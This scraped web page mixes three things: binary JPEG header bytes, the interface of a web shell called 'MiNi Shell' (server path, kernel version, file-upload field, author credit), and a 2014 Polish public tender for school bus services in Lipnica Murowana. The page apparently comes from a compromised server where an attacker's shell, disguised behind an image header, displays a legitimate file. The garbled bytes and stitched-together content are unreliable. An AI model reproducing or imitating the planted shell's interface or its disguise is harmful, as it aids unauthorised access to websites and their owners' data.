JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140721/157773-N-2014.html

<p class="kh_header"><b>Lipnica Murowana: Dowóz uczniów do szkół i przedszkoli  z terenu Gminy Lipnica Murowana i z powrotem do miejsca zamieszkania w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 157773 - 2014; data zamieszczenia: 21.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Szkół i Przedszkoli w Lipnicy Murowanej , 59, 32-724 Lipnica Murowana, woj. małopolskie, tel. 14 685 20 59, faks 14 685 21 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lipnicamurowana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół i przedszkoli  z terenu Gminy Lipnica Murowana i z powrotem do miejsca zamieszkania w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:Dowóz uczniów do szkół i przedszkoli z terenu Gminy Lipnica Murowana i z powrotem do miejsca zamieszkania w roku szkolnym 14/2015.
2. Zamawiający dopuszcza składanie ofert częściowych na każdą z części zamówienia opisanych w niniejszym punkcie. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia. Zamówienie obejmuje dwie części: Część 1/ Dowóz uczniów na trasach nr 1, 2, 3, 4, 5 - wykonawca zapewnia opiekę w czasie dowozu uczniów i ponosi odpowiedzialność za ich bezpieczeństwo 
Część 2/ Dowóz uczniów na trasie nr 6  - wykonawca nie zapewnia opieki w czasie dowozu uczniów  3.Szczegółowy opis poszczególnych części zamówienia:
Część 1/ Dowóz uczniów na trasach nr 1, 2, 3, 4, 5 - wykonawca zapewnia opiekę w czasie dowozu uczniów i ponosi odpowiedzialność za ich bezpieczeństwo:TRASA NR I Lipnica Górna -Lipnica Murowana -  Lipnica Dolna  - Lipnica Górna. Długość trasy  24 km dziennie. Przewidywana liczba uczniów  - 35. TRASA NR 2 Lipnica Górna - Lipnica Murowana  - Borówna - Lipnica Murowana Szkoła - Lipnica Górna
Długość trasy: 80 km dziennie w tym A/ Borówna  przystanek PKS Nadole - Remiza OSP Borówna - Wymyślna - Lipnica Murowana Szkoła - Lipnica Górna szkoła (48 km dziennie). B/Lipnica Górna /Połom Duży/  - Lipnica Górna Wysoki Dział - Lipnica Górna Szkoła - Lipnica Murowana Szkoła (32 km dziennie).Przewidywana liczba uczniów - 108. TRASA NR 3 Lipnica Górna -Krasna Góra - Lipnica Górna. Długość trasy: 32 km dziennie. Przewidywana liczba uczniów - 13. TRASA NR 4 Lipnica Górna Lipnica Murowana - Działy Pdn. - Lipnica Górna. Długość trasy: 16 km dziennie. Przewidywana liczba uczniów -10. TRASA NR 5 Lipnica Murowana - Lipnica Górna Granice - Lipnica Murowana - Lipnica Górna. Długość trasy: 20 km dziennie 
Przewidywana liczba uczniów: 11. Część 2/ Dowóz uczniów na trasach nr  6 - wykonawca nie zapewnia opieki w czasie dowozu uczniów: TRASA NR 6 Rajbrot Nadole - Dominiczna Góra - Szkoła - Pasternik - Nagorze - Rajbrot Szkoła. Długość trasy: 72 km dziennie (6x12 km). Przewidywana liczba uczniów: 191. 4.Łączna dzienna długość trasy do pokonania przez Przewoźnika - 244 km. Łączną ilość dowożonych uczniów około 371. Liczba kilometrów oraz liczba dowożonych uczniów może ulec zmianie w związku z organizacją roku szkolnego. Dowóz uczniów odbywa się w dni nauki szkolnej. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z rozkładem ustalonym przez dyrektorów placówek oświatowych. Szczegółowy harmonogram dowozu uczniów Wykonawca ustali z dyrektorami poszczególnych placówek oświatowych z tym, że wstępnie określa się czas dowozu na godz. 6.40 - 8.00 i powrotu od godz. 12.30 - 16.00 od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od nauki. Harmonogram dowozu może ulec zmianie w związku ze zmianą organizacji danej placówki (planu lekcji).
5.Wykonawca zobowiązany jest do zapewnienia opiekunów dla dzieci w czasie przewozu na trasach 1,2,3,4,5 oraz ponosi wszelką odpowiedzialność za jego działania bądź zaniechania. Opiekun musi uczestniczyć w każdym przewozie dzieci na w/w trasach. 6. Ze względu na duże zróżnicowanie trasy (drogi gminne, powiatowe, wojewódzkie) zaleca się przeprowadzenie wizji lokalnej i sprawdzenie trasy dowozu w celu sporządzenia prawidłowej oferty. 7.Wykonanie przedmiotu zamówienia winno odbywać się zgodnie z przepisami ustawy - Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.), ustawy z dnia 15 listopada 1984 r. - Prawo przewozowe (t.j. Dz. U. z 2012 r., poz. 1173) oraz ustawy z dnia 6 września 2001 r., o transporcie drogowym (t.j. Dz. U. z 2013 roku, poz. 1414 z późn. zm.),.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.17.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że posiadają licencję na wykonywanie krajowego transportu osób. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonali dwie usługi związane z przewozem dzieci przez okres minimum 9 miesięcy każda, związane z przewozem dzieci do szkół w ilości nie mniejszej niż 80 uczniów i na odcinku o łącznej długości trasy nie krótszym niż 100 km dziennie, z podaniem wartości tych zamówień, przedmiotu oraz daty i miejsca wykonania. Dla każdej pozycji wykazu należy załączyć dokumenty (referencje) potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że dysponują pojazdami, którymi będą realizowane usługi dowożenia uczniów, posiadającymi ważne polisy ubezpieczeniowe OC i NW, aktualne badania techniczne oraz wystarczającą liczbę miejsc siedzących, aby zapewnić przewóz wszystkim uczniom wraz z opiekunem - wymagane są, co najmniej 1 pojazd posiadający minimum 50 miejsc siedzących,  co najmniej jeden pojazd posiadający  minimum 39 miejsc oraz co najmniej 1 pojazd posiadający minimum 14 miejsc siedzących.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, w tym, co najmniej trzema osobami, posiadającymi ważne prawo jazdy kategorii D uprawniające do kierowania pojazdami do przewozu osób oraz minimum trzyletnie doświadczenie w zakresie przewozu osób oraz osobami pełnoletnimi do opieki nad dziećmi.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że posiadają aktualną polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę, co najmniej 150 000 PLN. 
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje przedstawione w dokumentach załączonych do oferty.
6) Oferty Wykonawców podlegających wykluczeniu  z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 ustawy Prawo zamówień publicznych uznaje się za odrzucone. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy z Wykonawców musi spełniać warunki udziału w postępowaniu przy czym warunki dotyczące wiedzy i doświadczenia niezbędnego potencjału technicznego, osobowego oraz finansowego koniecznego do realizacji przedmiotu zamówienia będą oceniane łącznie w odniesieniu do łącznego potencjału występujących wspólnie wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (wspólnicy spółki cywilnej lub członkowie konsorcjum) mają obowiązek ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy. 2)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego muszą dołączyć do oferty stosowne pełnomocnictwo. 3)Pełnomocnictwo musi zawierać stwierdzenie, że pełnomocnicy są uprawnieni do reprezentowania w postępowaniu i zaciągania zobowiązań w imieniu podmiotów występujących wspólnie. 4)Każdy z podmiotów występujących wspólnie ma obowiązek dołączenia do oferty dokumentów dotyczących potwierdzenia nie podlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy wymienionych w V pkt 1-4, pozostałe dokumenty będą traktowane jako wspólne.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>uzasadniona konieczność zmiany liczby kilometrów wynikająca z przyczyn niezależnych od Zamawiającego, nie możliwych do przewidzenia a także wynikających z organizacji roku szkolnego, zmiany planów lekcji, zmiany liczby dzieci lub inna konieczność zmiany zakresu wykonania przedmiotu umowy. b) 	wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację umowy ze strony Wykonawcy lub ze strony Zamawiającego) lub nastąpi zmiana podwykonawców, kierowców, opiekunów. c)   wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy, d)   wystąpi zmiana stawek celnych lub podatkowych powodująca, ze wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmiana wynagrodzenia. 
e) wystąpi zmiana przepisów prawa, powodująca, że wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmiana wynagrodzenia.
4.    W przypadku zaistnienia powyższych okoliczności Zamawiający i Wykonawca postanawia o zmianie przedmiotu zamówienia lub sposobu świadczenia albo terminu wykonania umowy bądź też o wysokości wynagrodzenia wykonawcy ustalonego w umowie. Każdy z przypadków wymienionych powyżej udokumentowany zostanie stosownym protokołem, podpisanym przez Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lipnicamurowana.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego Lipnica Murowana 59, lub pocztą zgłaszając zapotrzebowanie na adres: Zespół Obsługi Szkół i Przedszkoli w Lipnicy Murowanej, 32-724 Lipnica Murowana 59..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 08:45, miejsce: Zespół Obsługi Szkół i Przedszkoli w Lipnicy Murowanej, 32-724 Lipnica Murowana 59.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz uczniów do szkół i przedszkoli z terenu Gminy Lipnica Murowana i z powrotem do miejsca zamieszkania w roku szkolnym 2014/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz uczniów na trasach nr 1, 2, 3, 4, 5 - wykonawca zapewnia opiekę w czasie dowozu uczniów i ponosi odpowiedzialność za ich bezpieczeństwo:TRASA NR I
Lipnica Górna -Lipnica Murowana -  Lipnica Dolna  - Lipnica Górna. Długość trasy  24 km dziennie. Przewidywana liczba uczniów  - 35. TRASA NR 2 Lipnica Górna - Lipnica Murowana  - Borówna - Lipnica Murowana Szkoła - Lipnica Górna
Długość trasy: 80 km dziennie w tym
A/ Borówna  przystanek PKS Nadole - Remiza OSP Borówna - Wymyślna - Lipnica Murowana Szkoła - Lipnica Górna szkoła (48 km dziennie) B/Lipnica Górna /Połom Duży/  - Lipnica Górna Wysoki Dział - Lipnica Górna Szkoła - Lipnica Murowana Szkoła (32 km dziennie). Przewidywana liczba uczniów - 108. TRASA NR 3 Lipnica Górna -Krasna Góra - Lipnica Górna. Długość trasy: 32 km dziennie. Przewidywana liczba uczniów - 13.TRASA NR 4 Lipnica Górna Lipnica Murowana - Działy Pdn. - Lipnica Górna. Długość trasy: 16 km dziennie. Przewidywana liczba uczniów -10. TRASA NR 5 Lipnica Murowana - Lipnica Górna Granice - Lipnica Murowana - Lipnica Górna. Długość trasy: 20 km dziennie. Przewidywana liczba uczniów: 11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz uczniów do szkół i przedszkoli z terenu Gminy Lipnica Murowana i z powrotem do miejsca zamieszkania w roku szkolnym 2014/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz uczniów na trasach nr  6 - wykonawca nie zapewnia opieki w czasie dowozu uczniów:
TRASA NR 6
Rajbrot Nadole - Dominiczna Góra - Szkoła - Pasternik - Nagorze - Rajbrot Szkoła
Długość trasy: 72 km dziennie (6x12 km). Przewidywana liczba uczniów: 191.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com